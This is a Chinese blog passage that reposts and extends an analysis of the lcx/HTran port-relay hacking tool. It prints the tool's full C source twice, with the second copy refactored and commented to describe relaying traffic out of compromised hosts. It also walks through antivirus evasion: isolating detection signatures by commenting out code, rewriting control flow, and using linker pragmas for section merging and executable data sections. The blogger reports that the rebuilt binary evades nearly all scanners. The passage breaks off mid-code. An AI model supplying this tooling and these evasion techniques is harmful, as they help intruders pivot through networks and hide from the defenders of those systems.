lcx源代码以及免杀的研究
生活随笔
收集整理的這篇文章主要介紹了
lcx源代码以及免杀的研究
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
==========================================================================
先轉載一下別人的文章,后面有我的分析
==========================================================================
之前和Random大神討論了一下免殺的問題,他給出了一個比較不錯的想法,使用debug版本發布可以過很多殺軟。順便看了下lcx的源碼,發現其代碼不算特別復雜,于是乎就在這分析一下。
報毒情況
因為使用的源代碼編譯,報毒不算很多,因為lcx使用的都是socket運行時不會被殺掉。基本上不報毒就是可以用了使用debug方式發布的報毒
?
使用release方式發布的報毒情況,的確是多了那么幾個但是沒有想象中多的那么多
?源代碼
大體看了一下,其實就是很簡單的運用了socket,三個核心函數bind2bind() conn2bind() conn2conn() 最后都是生成兩個socket,之后放到transmitdata()里面傳遞數據 之前不大理解一個端口綁定兩個socket,在代碼里發現setsockopt()可以設置,因為每一個連接都由本地地址和遠端地址的組合唯一確定,所以只要遠端地址不同,兩個套接口與一個地址捆綁并無大礙。為了通知WINDOWS套接口實現不要因為一個地址已被一個套接口使用就不讓它與另一個套接口捆綁,應用程序可在bind()調用前先設置SO_REUSEADDR選項。 /* ************************************************************************************ * * HTran.cpp - HUC Packet Transmit Tool. * * Copyright (C) 2000-2004 HUC All Rights Reserved. * * Author : lion * : lion#cnhonker.net * : <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> * : * Notice : Thx to bkbll (bkbll#cnhonker.net) * : * Date : 2003-10-20 * : * Complie : cl HTran.cpp * : * Usage : E:\>HTran * : ======================== HUC Packet Transmit Tool V1.00 ======================= * : =========== Code by lion & bkbll, Welcome to <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> ========== * : * : [Usage of Packet Transmit:] * : HTran - [-log logfile] * : * : [option:] * : -listen * : -tran * : -slave * ************************************************************************************ */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <winsock.h> #include <signal.h> #include <errno.h> #include <io.h> #pragma comment(lib, "ws2_32.lib")#define VERSION "1.00" #define TIMEOUT 300 #define MAXSIZE 20480 #define HOSTLEN 40 #define CONNECTNUM 5// define 2 socket struct struct transocket { SOCKET fd1; SOCKET fd2; };// define function void ver(); void usage(char *prog); void transmitdata(LPVOID data); void getctrlc(int j); void closeallfd(); void makelog(char *buffer, int length); void proxy(int port); void bind2bind(int port1, int port2); void bind2conn(int port1, char *host, int port2); void conn2conn(char *host1, int port1, char *host2, int port2); int testifisvalue(char *str); int create_socket(); int create_server(int sockfd, int port); int client_connect(int sockfd, char* server, int port);// define GLOBAL variable here extern int errno; FILE *fp; int method=0; //int connectnum=0;//************************************************************************************ // // function main 主要是處理用戶參數輸入的問題 // //************************************************************************************ VOID main(int argc, char* argv[]) { char **p; char sConnectHost[HOSTLEN], sTransmitHost[HOSTLEN]; int iConnectPort=0, iTransmitPort=0; char *logfile=NULL; ver(); memset(sConnectHost, 0, HOSTLEN); memset(sTransmitHost, 0, HOSTLEN); p=argv; while(*p) { if(stricmp(*p, "-log") == 0) { if(testifisvalue(*(p+1))) { logfile = *(++p); } else { printf("[-] ERROR: Must supply logfile name.\r\n"); return; } p++; continue; } p++; } if(logfile !=NULL) { fp=fopen(logfile,"a"); if(fp == NULL ) { printf("[-] ERROR: open logfile"); return; } makelog("====== Start ======\r\n", 22); } // Win Start Winsock. WSADATA wsadata; WSAStartup(MAKEWORD(1, 1), &wsadata); signal(SIGINT, &getctrlc); if(argc > 2) { if(stricmp(argv[1], "-listen") == 0 && argc >= 4) { iConnectPort = atoi(argv[2]); iTransmitPort = atoi(argv[3]); method = 1; } else if(stricmp(argv[1], "-tran") == 0 && argc >= 5) { iConnectPort = atoi(argv[2]); strncpy(sTransmitHost, argv[3], HOSTLEN); iTransmitPort = atoi(argv[4]); method = 2; } else if(stricmp(argv[1], "-slave") == 0 && argc >= 6) { strncpy(sConnectHost, argv[2], HOSTLEN); iConnectPort = atoi(argv[3]); strncpy(sTransmitHost, argv[4], HOSTLEN); iTransmitPort = atoi(argv[5]); method = 3; } } switch(method) { case 1: bind2bind(iConnectPort, iTransmitPort); break; case 2: bind2conn(iConnectPort, sTransmitHost, iTransmitPort); break; case 3: conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); break; default: usage(argv[0]); break; } if(method) { closeallfd(); } WSACleanup(); return; }//************************************************************************************ // // print version message // //************************************************************************************ VOID ver() { printf("======================== HUC Packet Transmit Tool V%s =======================\r\n", VERSION); printf("=========== Code by lion & bkbll, Welcome to http://www.cnhonker.com==========\r\n\n"); }//************************************************************************************ // // print usage message // //************************************************************************************ VOID usage(char* prog) { printf("[Usage of Packet Transmit:]\r\n"); printf(" %s - [-log logfile]\n\n", prog); printf("[option:]\n"); printf(" -listen \n"); printf(" -tran \n"); printf(" -slave \n\n"); return; }//************************************************************************************ // // test if is value // //************************************************************************************ int testifisvalue(char *str) { if(str == NULL ) return(0); if(str[0]=='-') return(0); return(1); }//************************************************************************************ // // LocalHost:ConnectPort transmit to LocalHost:TransmitPort // //************************************************************************************ void bind2bind(int port1, int port2) { SOCKET fd1,fd2, sockfd1, sockfd2; struct sockaddr_in client1,client2; int size1,size2; HANDLE hThread=NULL; transocket sock; DWORD dwThreadID; if((fd1=create_socket())==0) return; if((fd2=create_socket())==0) return; printf("[+] Listening port %d ......\r\n",port1); fflush(stdout); if(create_server(fd1, port1)==0) { closesocket(fd1); return; } printf("[+] Listen OK!\r\n"); printf("[+] Listening port %d ......\r\n",port2); fflush(stdout); if(create_server(fd2, port2)==0) { closesocket(fd2); return; } printf("[+] Listen OK!\r\n"); size1=size2=sizeof(struct sockaddr); while(1) { printf("[+] Waiting for Client on port:%d ......\r\n",port1); if((sockfd1 = accept(fd1,(struct sockaddr *)&client1,&size1))<0) { printf("[-] Accept1 error.\r\n"); continue; } printf("[+] Accept a Client on port %d from %s ......\r\n", port1, inet_ntoa(client1.sin_addr)); printf("[+] Waiting another Client on port:%d....\r\n", port2); if((sockfd2 = accept(fd2, (struct sockaddr *)&client2, &size2))<0) { printf("[-] Accept2 error.\r\n"); closesocket(sockfd1); continue; } printf("[+] Accept a Client on port %d from %s\r\n",port2, inet_ntoa(client2.sin_addr)); printf("[+] Accept Connect OK!\r\n"); sock.fd1 = sockfd1; sock.fd2 = sockfd2; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } }//************************************************************************************ // // LocalHost:ConnectPort transmit to TransmitHost:TransmitPort // //************************************************************************************ void bind2conn(int port1, char *host, int port2) { SOCKET sockfd,sockfd1,sockfd2; struct sockaddr_in remote; int size; char buffer[1024]; HANDLE hThread=NULL; transocket sock; DWORD dwThreadID; if (port1 > 65535 || port1 < 1) { printf("[-] ConnectPort invalid.\r\n"); return; } if (port2 > 65535 || port2 < 1) { printf("[-] TransmitPort invalid.\r\n"); return; } memset(buffer,0,1024); if((sockfd=create_socket()) == INVALID_SOCKET) return; if(create_server(sockfd, port1) == 0) { closesocket(sockfd); return; } size=sizeof(struct sockaddr); while(1) { printf("[+] Waiting for Client ......\r\n"); if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,&size))<0) { printf("[-] Accept error.\r\n"); continue; } printf("[+] Accept a Client from %s:%d ......\r\n", inet_ntoa(remote.sin_addr), ntohs(remote.sin_port)); if((sockfd2=create_socket())==0) { closesocket(sockfd1); continue; } printf("[+] Make a Connection to %s:%d ......\r\n",host,port2); fflush(stdout); if(client_connect(sockfd2,host,port2)==0) { closesocket(sockfd2); sprintf(buffer,"[SERVER]connection to %s:%d error\r\n", host, port2); send(sockfd1,buffer,strlen(buffer),0); memset(buffer, 0, 1024); closesocket(sockfd1); continue; } printf("[+] Connect OK!\r\n"); sock.fd1 = sockfd1; sock.fd2 = sockfd2; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } }//************************************************************************************ // // ConnectHost:ConnectPort transmit to TransmitHost:TransmitPort // //************************************************************************************ void conn2conn(char *host1,int port1,char *host2,int port2) { SOCKET sockfd1,sockfd2; HANDLE hThread=NULL; transocket sock; DWORD dwThreadID; fd_set fds; int l; char buffer[MAXSIZE]; while(1) { /* while(connectnum) { if(connectnum < CONNECTNUM) { Sleep(10000); break; } else { Sleep(TIMEOUT*1000); continue; } } */ if((sockfd1=create_socket())==0) return; if((sockfd2=create_socket())==0) return; printf("[+] Make a Connection to %s:%d....\r\n",host1,port1); fflush(stdout); if(client_connect(sockfd1,host1,port1)==0) { closesocket(sockfd1); closesocket(sockfd2); continue; } // fix by bkbll // if host1:port1 recved data, than connect to host2,port2 l=0; memset(buffer,0,MAXSIZE); while(1) { FD_ZERO(&fds); FD_SET(sockfd1, &fds); if (select(sockfd1+1, &fds, NULL, NULL, NULL) == SOCKET_ERROR) { if (errno == WSAEINTR) continue; break; } if (FD_ISSET(sockfd1, &fds)) { l=recv(sockfd1, buffer, MAXSIZE, 0); break; } Sleep(5); } if(l<=0) { printf("[-] There is a error...Create a new connection.\r\n"); continue; } while(1) { printf("[+] Connect OK!\r\n"); printf("[+] Make a Connection to %s:%d....\r\n", host2,port2); fflush(stdout); if(client_connect(sockfd2,host2,port2)==0) { closesocket(sockfd1); closesocket(sockfd2); continue; } if(send(sockfd2,buffer,l,0)==SOCKET_ERROR) { printf("[-] Send failed.\r\n"); continue; } l=0; memset(buffer,0,MAXSIZE); break; } printf("[+] All Connect OK!\r\n"); sock.fd1 = sockfd1; sock.fd2 = sockfd2; hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) { TerminateThread(hThread, 0); return; } // connectnum++; Sleep(1000); printf("[+] CreateThread OK!\r\n\n"); } }//************************************************************************************ // // Socket Transmit to Socket // //************************************************************************************ void transmitdata(LPVOID data) { SOCKET fd1, fd2; transocket *sock; struct timeval timeset; fd_set readfd,writefd; int result,i=0; char read_in1[MAXSIZE],send_out1[MAXSIZE]; char read_in2[MAXSIZE],send_out2[MAXSIZE]; int read1=0,totalread1=0,send1=0; int read2=0,totalread2=0,send2=0; int sendcount1,sendcount2; int maxfd; struct sockaddr_in client1,client2; int structsize1,structsize2; char host1[20],host2[20]; int port1=0,port2=0; char tmpbuf[100];sock = (transocket *)data; fd1 = sock->fd1; fd2 = sock->fd2;memset(host1,0,20); memset(host2,0,20); memset(tmpbuf,0,100);structsize1=sizeof(struct sockaddr); structsize2=sizeof(struct sockaddr);if(getpeername(fd1,(struct sockaddr *)&client1,&structsize1)<0) { strcpy(host1, "fd1"); } else { // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port)); strcpy(host1, inet_ntoa(client1.sin_addr)); port1=ntohs(client1.sin_port); }if(getpeername(fd2,(struct sockaddr *)&client2,&structsize2)<0) { strcpy(host2,"fd2"); } else { // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port)); strcpy(host2, inet_ntoa(client2.sin_addr)); port2=ntohs(client2.sin_port); }printf("[+] Start Transmit (%s:%d <-> %s:%d) ......\r\n\n", host1, port1, host2, port2);maxfd=max(fd1,fd2)+1; memset(read_in1,0,MAXSIZE); memset(read_in2,0,MAXSIZE); memset(send_out1,0,MAXSIZE); memset(send_out2,0,MAXSIZE);timeset.tv_sec=TIMEOUT; timeset.tv_usec=0;while(1) { FD_ZERO(&readfd); FD_ZERO(&writefd);FD_SET((UINT)fd1, &readfd); FD_SET((UINT)fd1, &writefd); FD_SET((UINT)fd2, &writefd); FD_SET((UINT)fd2, &readfd);result=select(maxfd,&readfd,&writefd,NULL,×et); if((result<0) && (errno!=EINTR)) { printf("[-] Select error.\r\n"); break; } else if(result==0) { printf("[-] Socket time out.\r\n"); break; }if(FD_ISSET(fd1, &readfd)) { /* must < MAXSIZE-totalread1, otherwise send_out1 will flow */ if(totalread1) { read1=recv(fd1, read_in1, MAXSIZE-totalread1, 0); if((read1==SOCKET_ERROR) || (read1==0)) { printf("[-] Read fd1 data error,maybe close?\r\n"); break; }memcpy(send_out1+totalread1,read_in1,read1); sprintf(tmpbuf,"\r\nRecv %5d bytes from %s:%d\r\n", read1, host1, port1); printf(" Recv %5d bytes %16s:%d\r\n", read1, host1, port1); makelog(tmpbuf,strlen(tmpbuf)); makelog(read_in1,read1); totalread1+=read1; memset(read_in1,0,MAXSIZE); } }if(FD_ISSET(fd2, &writefd)) { int err=0; sendcount1=0; while(totalread1>0) { send1=send(fd2, send_out1+sendcount1, totalread1, 0); if(send1==0)break; if((send1<0) && (errno!=EINTR)) { printf("[-] Send to fd2 unknow error.\r\n"); err=1; break; }if((send1<0) && (errno==ENOSPC)) break; sendcount1+=send1; totalread1-=send1;printf(" Send %5d bytes %16s:%d\r\n", send1, host2, port2); }if(err==1) break; if((totalread1>0) && (sendcount1>0)) { /* move not sended data to start addr */ memcpy(send_out1,send_out1+sendcount1,totalread1); memset(send_out1+totalread1,0,MAXSIZE-totalread1); } else memset(send_out1,0,MAXSIZE); }if(FD_ISSET(fd2, &readfd)) { if(totalread2) { read2=recv(fd2,read_in2,MAXSIZE-totalread2, 0); if(read2==0)break; if((read2<0) && (errno!=EINTR)) { printf("[-] Read fd2 data error,maybe close?\r\n\r\n"); break; }memcpy(send_out2+totalread2,read_in2,read2); sprintf(tmpbuf, "\r\nRecv %5d bytes from %s:%d\r\n", read2, host2, port2); printf(" Recv %5d bytes %16s:%d\r\n", read2, host2, port2); makelog(tmpbuf,strlen(tmpbuf)); makelog(read_in2,read2); totalread2+=read2; memset(read_in2,0,MAXSIZE); } }if(FD_ISSET(fd1, &writefd)) { int err2=0; sendcount2=0; while(totalread2>0) { send2=send(fd1, send_out2+sendcount2, totalread2, 0); if(send2==0)break; if((send2<0) && (errno!=EINTR)) { printf("[-] Send to fd1 unknow error.\r\n"); err2=1; break; } if((send2<0) && (errno==ENOSPC)) break; sendcount2+=send2; totalread2-=send2;printf(" Send %5d bytes %16s:%d\r\n", send2, host1, port1); } if(err2==1) break; if((totalread2>0) && (sendcount2 > 0)) { /* move not sended data to start addr */ memcpy(send_out2, send_out2+sendcount2, totalread2); memset(send_out2+totalread2, 0, MAXSIZE-totalread2); } else memset(send_out2,0,MAXSIZE); }Sleep(5); }closesocket(fd1); closesocket(fd2); // if(method == 3) // connectnum --;printf("\r\n[+] OK! I Closed The Two Socket.\r\n"); }void getctrlc(int j) { printf("\r\n[-] Received Ctrl+C\r\n"); closeallfd(); exit(0); }void closeallfd() { int i; printf("[+] Let me exit ......\r\n"); fflush(stdout); for(i=3; i<256; i++) { closesocket(i); } if(fp != NULL) { fprintf(fp,"\r\n====== Exit ======\r\n"); fclose(fp); } printf("[+] All Right!\r\n"); }int create_socket() { int sockfd; sockfd=socket(AF_INET,SOCK_STREAM,0); if(sockfd<0) { printf("[-] Create socket error.\r\n"); return(0); } return(sockfd); }int create_server(int sockfd,int port) { struct sockaddr_in srvaddr; int on=1; memset(&srvaddr, 0, sizeof(struct sockaddr)); srvaddr.sin_port=htons(port); srvaddr.sin_family=AF_INET; srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR, (char*)&on,sizeof(on)); //so I can rebind the port if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0) { printf("[-] Socket bind error.\r\n"); return(0); } if(listen(sockfd,CONNECTNUM)<0) { printf("[-] Socket Listen error.\r\n"); return(0); } return(1); }int client_connect(int sockfd,char* server,int port) { struct sockaddr_in cliaddr; struct hostent *host; if(!(host=gethostbyname(server))) { printf("[-] Gethostbyname(%s) error:%s\n",server,strerror(errno)); return(0); } memset(&cliaddr, 0, sizeof(struct sockaddr)); cliaddr.sin_family=AF_INET; cliaddr.sin_port=htons(port); cliaddr.sin_addr=*((struct in_addr *)host->h_addr); if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0) { printf("[-] Connect error.\r\n"); return(0); } return(1); }void makelog(char *buffer,int length) { if(fp !=NULL) { // fprintf(fp, "%s", buffer); // printf("%s",buffer); write(fileno(fp),buffer,length); // fflush(fp); } }關于免殺
理論上來說只要找到特征碼的那一段程序,然后改一改就可以了。 通常有源碼情況下的免殺思路是使用MyCLL確定特征碼,再通過特征碼推出,原始語句并進行修改。 不過介于LCX的代碼比較短,考慮直接從源代碼入手。 四個核心函數bind2bind() conn2bind() conn2conn()?transmitdata()分別注釋掉。 注釋掉 ?bind2bind() 報毒情況? Ikarus Backdoor.Win32.Liondoor 20130709 Kaspersky not-a-virus:HEUR:NetTool.Win32.Transmit.gen 20130709 注釋掉 bind2bind() conn2bind() conn2conn() 報毒情況?妥妥的沒有毒~~~ 注釋掉 bind2bind() conn2bind()?報毒情況?
還是妥妥的沒有毒~~~ 注釋掉 conn2bind()?報毒情況?
依舊是妥妥的沒有毒~~~
其實這里我們只需要吧conn2bind()直接注釋掉就可以了,它對應了-tran這個功能非常不常用,但是本著精益求精的態度,還是繼續分析一下。 注釋掉conn2bind()的函數內容,報毒反而增多了,有點詭異。 ESET-NOD32 a variant of Win32/HackTool.Hucline.C 20130708 Jiangmin Heur:Backdoor/RemoteControl 20130709 Kaspersky not-a-virus:HEUR:NetTool.Win32.Transmit.gen 20130709 這里突然醒悟,其實特征碼也不在conn2bind()中,而是在main()函數的一段代碼,在這里只要把下面的代碼注釋掉就不會報錯。 switch(method) { case 1: bind2bind(iConnectPort, iTransmitPort); break; case 2: bind2conn(iConnectPort, sTransmitHost, iTransmitPort); break; case 3: conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); break; default: usage(argv[0]); break; } 我們試著修改它一下?
if (method==1) bind2bind(iConnectPort, iTransmitPort); else if (method==2) bind2conn(iConnectPort, sTransmitHost, iTransmitPort); else if (method==3) conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); else usage(argv[0]); 依舊報錯了,還是那3個殺軟。 試著加點料,結果還是不行 if (method==1){ __asm nop; bind2bind(iConnectPort, iTransmitPort); } else if (method==2){ __asm nop; bind2conn(iConnectPort, sTransmitHost, iTransmitPort); } else if (method==3){ __asm nop; conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); } else { __asm nop; usage(argv[0]); } 這時突然發現我又傻逼了,其實特征碼應該在transmitdata()中,感覺江民定位的代碼應該是這一句 hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 如果是地址定位的話,換一換函數和變量的定義順序應該就可以,但是沒有生效。這里因為不想裝一個殺軟做測試所以,留個坑。 最后貼上幾個比較通用的免殺方法,是看雪的一個神貼里面的。 http://bbs.pediy.com/showthread.php?t=134354?
設置對齊方式 #pragma comment(linker, "/FILEALIGN:16") // 設置最小節的大小,數值越小文件的體積就越小,不過最小是16 #pragma comment(linker, "/ALIGN:16") 優化選項 // 清除從未引用的函數和/或數據 #pragma comment(linker, "/opt:ref") #pragma comment (linker, "/OPT:ICF") // 獲得精簡應用程序,減小體積 #pragma comment(linker, "/opt:nowin98")
區段的合并和獨立 // 設置data段屬性為可讀可寫可執行 #pragma comment(linker, "/section:.data,RWE") // 接下來就可以進行區段合并操作了比如,將上面的text和rdata都合并到data去 #pragma comment(linker, "/MERGE:.rdata=.data") #pragma comment(linker, "/MERGE:.text=.data")
另外一種方法就是將一個文件的代碼全部放置到一個自定義段中?
#pragma code_seg("section1") =============================================== 以上都轉載別人的文章,下面是我自己寫的。 我把lcx的代碼重構了一遍,并添加了中文注釋,沒有做任何免殺處理,多引擎殺毒只有一款冰島的殺毒軟件還查殺的出來其他 全都過了,源碼免殺就是強悍呀,貌似反匯編免殺目前只有真正的牛人才可以做到,對于普通人來言這門技術已失去其含義。 貼出來查殺結果:
我從網上下載了好幾個lcx,報毒非常嚴重,也貼出來吧,
下面貼出來源碼(我修改過的): /* ************************************************************************************ * * HTran.cpp - HUC Packet Transmit Tool. * * Copyright (C) 2000-2004 HUC All Rights Reserved. * * Author : lion * : lion#cnhonker.net * : <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> * : * Notice : Thx to bkbll (bkbll#cnhonker.net) * : * Date : 2003-10-20 * : * Complie : cl HTran.cpp * : * Usage : E:\>HTran * : ======================== HUC Packet Transmit Tool V1.00 ======================= * : =========== Code by lion & bkbll, Welcome to <a href="http://www.cnhonker.com" target="_blank">http://www.cnhonker.com</a> ========== * : * : [Usage of Packet Transmit:] * : HTran - [-log logfile] * : * : [option:] * : -listen * : -tran * : -slave * ************************************************************************************ */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <winsock.h> #include <signal.h> #include <errno.h> #include <io.h> #pragma comment(lib, "ws2_32.lib")//禁用提示 #pragma warning(disable:4996)//禁用窗口模式 //#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")#define VERSION "1.00" //版本號 #define TIMEOUT 300 //超時時間(五分鐘) #define MAXSIZE 20480 //最大數據包 #define HOSTLEN 40 //地址長度 #define CONNECTNUM 5 //最大連接//線程傳參結構體 struct transocket {SOCKET fd1;SOCKET fd2; };//函數定義 void transmitdata(LPVOID data); void closeallfd(); void bind2bind(int port1, int port2); void bind2conn(int port1, char *host, int serverPort); void conn2conn(char *publicIP, int publicPort, char *host2, int port2); int create_socket(); int create_server(int sockfd, int port); int client_connect(int sockfd, char* server, int port);FILE *fp; //日志文件 char log[256]; //log緩沖區 int method=0;//輸出日志 void makelog(bool print, LPCTSTR lpFormat, ...) {//解析參數TCHAR szArgMessage[3000] = {0};va_list args;va_start(args, lpFormat);_vstprintf(szArgMessage, lpFormat, args);va_end(args);szArgMessage[strlen(szArgMessage)]='\r';szArgMessage[strlen(szArgMessage)]='\n';//輸出到屏幕if (print){printf("%s",szArgMessage);fflush(stdout);}try{if(fp !=NULL){SYSTEMTIME st;GetSystemTime(&st);TCHAR szArgMessageTime[3000] = {0};_sntprintf(szArgMessageTime,3000,"%d%d%d%d%d%d---%s",st.wYear,st.wMonth,st.wDay,st.wHour,st.wMinute,st.wSecond,szArgMessage);write(fileno(fp),szArgMessageTime,strlen(szArgMessageTime));}}catch (...){}}//接收 CTRL+C void getctrlc(int j) {makelog(true,"接收到 Ctrl+C 結束程序");closeallfd();exit(0); }//版本信息 VOID ver() { printf("======================== HUC Packet Transmit Tool V%s =======================\r\n", VERSION);printf("=========== Code by lion & bkbll, Welcome to http://www.cnhonker.com==========\r\n\n"); }//打印提示 VOID usage(char* prog) { printf("[Usage of Packet Transmit:]\r\n");printf(" %s - [-log logfile]\n\n", prog);printf("[option:]\n");printf(" -listen <ConnectPort> <TransmitPort>\n");printf(" -tran <ConnectPort> <TransmitHost> <TransmitPort>\n");printf(" -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>\n\n");return; }//檢驗字符 int TestIsValue(char *str) {if(str == NULL ) return(0);if(str[0]=='-') return(0);return(1); }//************************************************************************************ // // function main 主要是處理用戶參數輸入的問題 // //************************************************************************************ VOID main(int argc, char* argv[]) {char sConnectHost[HOSTLEN], sTransmitHost[HOSTLEN];int iConnectPort=0, iTransmitPort=0;char *logfile=NULL;ver();memset(sConnectHost, 0, HOSTLEN);memset(sTransmitHost, 0, HOSTLEN);//支持log文件fp=fopen("lcx.log","a");if(fp == NULL ) {printf("創建日志文件失敗");return;}makelog(true,"lcx程序啟動中...");//初始化網絡庫WSADATA wsadata;WSAStartup(MAKEWORD(2, 2), &wsadata);//接收 CTRL+Csignal(SIGINT, &getctrlc);if(argc > 2){//中轉服務器if(stricmp(argv[1], "-listen") == 0 && argc >= 4){iConnectPort = atoi(argv[2]);iTransmitPort = atoi(argv[3]);method = 1;}else if(stricmp(argv[1], "-tran") == 0 && argc >= 5){iConnectPort = atoi(argv[2]);strncpy(sTransmitHost, argv[3], HOSTLEN);iTransmitPort = atoi(argv[4]);method = 2;}//肉雞(有可能是其他機器)else if(stricmp(argv[1], "-slave") == 0 && argc >= 6){strncpy(sConnectHost, argv[2], HOSTLEN);iConnectPort = atoi(argv[3]);strncpy(sTransmitHost, argv[4], HOSTLEN);iTransmitPort = atoi(argv[5]);method = 3;}}switch(method){case 1:bind2bind(iConnectPort, iTransmitPort);break;case 2:bind2conn(iConnectPort, sTransmitHost, iTransmitPort);break;case 3:conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort);break;default:usage(argv[0]);break;}if(method){closeallfd();}WSACleanup();return; }//綁定兩個服務器socket void bind2bind(int port1, int port2) {makelog(true,"成功創建服務器...");SOCKET fd1,fd2, sockfd1, sockfd2;struct sockaddr_in client1,client2;transocket sock;DWORD dwThreadID;if((fd1=create_socket())==0) return;if((fd2=create_socket())==0) return;//創建第一個服務器if(create_server(fd1, port1)==0){closesocket(fd1);return;}makelog(true, "成功監聽端口 :%d", port1);//創建第二個服務器if(create_server(fd2, port2)==0){closesocket(fd2);return;}makelog(true, "成功監聽端口 :%d", port2);//死循環等待兩方客戶端上線int size1,size2;size1=size2=sizeof(struct sockaddr);while(1){//等待第一個個客戶上線端口makelog(true, "等待上線端口 :%d", port1);if((sockfd1 = accept(fd1, (struct sockaddr *)&client1, &size1))<0){makelog(true, "accept函數出現問題");continue;}makelog(true, "第一個客戶端成功上線,端口:%d IP地址:%s", port1, inet_ntoa(client1.sin_addr));//第二個客戶端上線makelog(true, "等待上線端口 :%d", port2);if((sockfd2 = accept(fd2, (struct sockaddr *)&client2, &size2))<0){makelog(true, "accept函數出現問題");closesocket(sockfd1);continue;}makelog(true, "第二個客戶端成功上線,端口:%d IP地址:%s", port2, inet_ntoa(client2.sin_addr));makelog(true, "創建數據轉發的線程");//線程傳參,把兩個服務器的socket傳到線程里面sock.fd1 = sockfd1;sock.fd2 = sockfd2;HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) {makelog(true, "強制結束數據轉發的線程");TerminateThread(hThread, 0);return;}Sleep(1000);makelog(true, "創建數據轉發的線程---成功");} }//代理服務器(我覺得這么叫比較合適) //參數一:本地監聽端口 //參數二、三:遠程IP和端口 void bind2conn(int server1Port, char *server2IP, int server2Port) {SOCKET sockfd,sockfd1,sockfd2;struct sockaddr_in remote;//校驗端口非法if (server1Port > 65535 || server1Port < 1){makelog(true, "端口非法");return;}if (server2Port > 65535 || server2Port < 1){makelog(true, "端口非法");return;}//創建套接字char buffer[1024];memset(buffer,0,1024);if((sockfd=create_socket()) == INVALID_SOCKET) return;//創建服務器if(create_server(sockfd, server1Port) == 0) {closesocket(sockfd);return;}while(1){makelog(true, "等待客戶端連接到本服務器");int size=sizeof(struct sockaddr);if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,&size))<0){makelog(true, "accept函數失敗");continue;}makelog(true, "成功接收一個客戶端 %s:%d",inet_ntoa(remote.sin_addr), ntohs(remote.sin_port));if((sockfd2=create_socket())==0) {closesocket(sockfd1);continue; }makelog(true, "連接到遠程服務器 %s:%d ......", server2IP, server2Port);if(client_connect(sockfd2,server2IP,server2Port)==0){closesocket(sockfd2);sprintf(buffer,"[SERVER]connection to %s:%d error\r\n", server2IP, server2Port);send(sockfd1, buffer, strlen(buffer), 0);memset(buffer, 0, 1024);closesocket(sockfd1);continue;}makelog(true, "代理成功");//線程傳參transocket sock;sock.fd1 = sockfd1;sock.fd2 = sockfd2;//創建線程,轉發數據DWORD dwThreadID;HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); if(hThread == NULL) {TerminateThread(hThread, 0);return;}Sleep(1000);} }//肉雞轉發數據 void conn2conn(char *publicIP, int publicPort, char *host2, int port2) {SOCKET sockfd1,sockfd2;fd_set fds;//這個循環的作用是建立多個連接,比如控制端和肉雞建立一個連接之后斷開,再次連接肉雞仍然是可以的(這次依靠的就是第二條連接)while(1){if((sockfd1=create_socket())==0) return;if((sockfd2=create_socket())==0) return;makelog(true,"試圖連接到公網地址 %s:%d", publicIP, publicPort);//連接到公網if(client_connect(sockfd1,publicIP,publicPort) == 0) {closesocket(sockfd1);closesocket(sockfd2);continue;}makelog(true,"連接到公網成功");// fix by bkbll // if host1:port1 recved data, than connect to host2,port2int l=0;char buffer[MAXSIZE];memset(buffer,0,MAXSIZE);//做一個死循環是為了防止出錯,正常情況流程只走一次while(1){FD_ZERO(&fds);FD_SET(sockfd1, &fds);//第一個參數系統忽略,最后一個參數為NULL代表永久等待if (select(sockfd1+1, &fds, NULL, NULL, NULL) == SOCKET_ERROR) {if (errno == WSAEINTR) continue;break;}if (FD_ISSET(sockfd1, &fds)) {l=recv(sockfd1, buffer, MAXSIZE, 0);break;}Sleep(5);}//錯誤校驗if(l <= 0) { makelog(true,"recv函數出錯了,重新建立連接");continue;}//做一個死循環是為了防止出錯,正常情況流程只走一次while(1){//輸出日志makelog(true,"試圖連接到內網地址 %s:%d", host2, port2);//連接到自己(或者另一個同局域網內網IP,或者一個公網IP)if(client_connect(sockfd2,host2,port2) == 0) {closesocket(sockfd1);closesocket(sockfd2);continue;}//向sockfd2發送數據if(send(sockfd2,buffer,l,0) == SOCKET_ERROR){ makelog(true,"send函數出錯了");continue;}//重置緩沖區l=0;memset(buffer,0,MAXSIZE);break;}makelog(true,"成功連接到兩端");//線程參數transocket sock;sock.fd1 = 